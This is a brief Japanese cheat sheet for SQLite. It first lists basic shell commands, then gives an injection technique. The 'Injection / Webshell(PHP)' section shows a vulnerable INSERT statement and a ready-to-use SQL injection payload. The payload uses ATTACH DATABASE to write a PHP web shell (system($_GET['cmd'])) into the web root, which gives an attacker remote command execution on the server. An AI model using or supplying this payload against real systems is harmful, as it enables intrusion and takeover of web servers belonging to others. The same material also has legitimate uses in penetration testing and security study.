SQLite

基本

対話シェルで起動

$ sqlite3 database.db

シェルに直接SQLの結果を返す

$ sqlite3 database.db 'select * from users;'

テーブル一覧の表示

sqlite> .table

Injection

Webshell(PHP)

ターゲットが以下のとき、

INSERT INTO subscribers (ip_address, email) VALUES('$foo', '$bar')

以下のようにする。

xxx','yyy');ATTACH DATABASE '/www/lol.php' AS lol;CREATE TABLE lol.pwn (dataz text);INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']) ?>");--